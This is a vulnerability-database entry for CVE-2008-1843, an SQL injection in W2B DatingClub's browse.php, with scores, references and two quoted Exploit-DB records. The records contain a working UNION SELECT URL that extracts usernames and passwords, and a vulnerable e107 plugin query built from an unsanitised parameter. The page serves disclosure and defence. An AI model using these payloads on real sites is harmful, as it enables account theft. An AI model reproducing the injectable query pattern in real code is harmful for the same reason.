CVE-2008-1843
published 2008-04-16CVE-2008-1843: SQL injection vulnerability in browse.php in W2B DatingClub (aka Dating Club) allows remote attackers to execute arbitrary SQL commands via the age_to…
PriorityP340high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
1.15%
62.9th percentile
SQL injection vulnerability in browse.php in W2B DatingClub (aka Dating Club) allows remote attackers to execute arbitrary SQL commands via the age_to parameter in a browsebyCat action.
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
e107 Plugin BLOG Engine 2.2 - 'rid' Blind SQL Injection
exploitdb·2008-05-13
CVE-2008-2455 e107 Plugin BLOG Engine 2.2 - 'rid' Blind SQL Injection
e107 Plugin BLOG Engine 2.2 - 'rid' Blind SQL Injection
---
[+] Author: Saime
[+] Script: e107 Plugin BLOG Engine v2.2 (rid) Blind SQL Injection
[+] URL: http://e107coders.org/download.php?view.1843
[+] Date: 13/05/2008
[+] Greetz: BaKo,DrWh4x,optiplex,xprog,cam-man-dan,Tulle,t0pP8uZz,Inspiratio,Novalok,illuz1oN,Untamed,GM,str0ke, and everyone else I forgot!
[+] Site: http://h4ck-y0u.org
[+] Vuln File: comment.php
[+] Line: 22-24
$rid = $_GET['rid'];
//blog entry echo
$sql -> db_Query("select ".MPREFIX."macgurublog_rec.*, blog_enable from ".MPREFIX."macgurublog_rec left join ".MPREFIX."macgurublog_main on (".MPREFIX."macgurublog_rec.blogrec_uid=".MPREFIX."macgurublog_main.blog_uid) where blogrec_id=".$rid.";");
[+] Exploit:
http://site.com/e107_plugins/macgurublog_menu/comment.php?rid=1
Exploit-DB
W2B Dating Club - 'browse.php' SQL Injection
exploitdb·2008-04-11
CVE-2008-1843 W2B Dating Club - 'browse.php' SQL Injection
W2B Dating Club - 'browse.php' SQL Injection
---
source: https://www.securityfocus.com/bid/28737/info
W2B Dating Club is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
This issue affects unknown versions of Dating Club; we will update this BID when more details become available.
http://www.example.com/[path]/browse.php?mode=browsebyCat&_gender=0&age_from=15&age_to=-4214/**/union/**/select/**/1,user_name,password,4,5,6,7,8/**/from/**/users/*&country=&state=&field=body
No writeups or analysis indexed.
http://forum.aria-security.com/showthread.php?p=70http://marc.info/?l=bugtraq&m=120792465631586&w=2http://secunia.com/advisories/29815http://www.osvdb.org/44371http://www.securityfocus.com/bid/28737https://exchange.xforce.ibmcloud.com/vulnerabilities/41792http://forum.aria-security.com/showthread.php?p=70http://marc.info/?l=bugtraq&m=120792465631586&w=2http://secunia.com/advisories/29815http://www.osvdb.org/44371http://www.securityfocus.com/bid/28737https://exchange.xforce.ibmcloud.com/vulnerabilities/41792
2008-04-16
Published